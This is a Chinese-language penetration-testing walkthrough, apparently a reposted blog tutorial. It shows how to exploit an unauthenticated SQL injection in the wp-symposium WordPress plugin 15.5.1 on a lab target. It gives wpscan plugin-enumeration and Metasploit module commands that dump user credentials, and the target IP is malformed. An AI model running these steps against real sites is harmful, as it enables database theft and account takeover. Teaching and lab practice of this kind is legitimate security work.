使用Symposium插件存在的SQL注入漏洞进行WordPress渗透测试

WP Symposium将WordPress网站变成了一个社交网络!它是一个WordPress插件,提供论坛,活动(类似于Facebook墙),成员目录,私人邮件,通知面板,聊天窗口,个人资料页面,社交窗口小部件,活动警报,RSS活动源,群组,活动,图库,Facebook连接和移动支持!您只需选择要激活的内容即可!会员可选择某些功能来保护他们的隐私。“
WordPress插件wp-symposium版本15.5.1(可能还有所有现有的早期版本)在get_album_item.php参数'size'中遭受未经身份验证的SQL注入。即使插件已停用,该问题也是可利用的。
SQL注入允许(非常容易)检索所有数据库内容,其中包括用户详细信息和密码哈希值。攻击者可能会破解用户的密码哈希并以其身份登录。如果获得管理员用户密码,则攻击者可以完全控制WordPress安装。收集的信息也可能允许进一步的攻击。
https://www.exploit-db.com/exploits/37824
攻击者:kali Linux
目标:wordpress
我们开始!!!!
从以下步骤开始在kali中使用WPSCAN:
现在扫描目标IP以扫描任何wordpress应用程序并键入以下命令
通过此命令,我们正在扫描为任何wordpress网站安装的当前插件。
./wpscan.rb -url http://192.1681.0.104 -enumerate p
使用Symposium插件存在的SQL注入漏洞进行WordPress渗透测试
指示wp座谈会15.5.1的红色标志易受攻击并且遭受未经身份验证的SQL注入,尽管蓝色标志显示版本15.8(如果已修复),直到现在还不容易受到攻击。
使用Symposium插件存在的SQL注入漏洞进行WordPress渗透测试
现在启动metasploit进行攻击并在kali Linux中的终端上键入msfconsole
msf > use auxiliary/admin/http/wp_symposium_sql_injection
msf auxiliary(wp_symposium_sql_injection) >set rhost 192.1681.0.104
msf auxiliary(wp_symposium_sql_injection) >set rport 80
msf auxiliary(wp_symposium_sql_injection) >exploit
好!在这里,我们分别以用户:raj找到相关的用户名密码
使用Symposium插件存在的SQL注入漏洞进行WordPress渗透测试
转载请注明本文链接: http://www.mayidui.net/t2327.html
游客
登录后才可以回帖,登录 或者 注册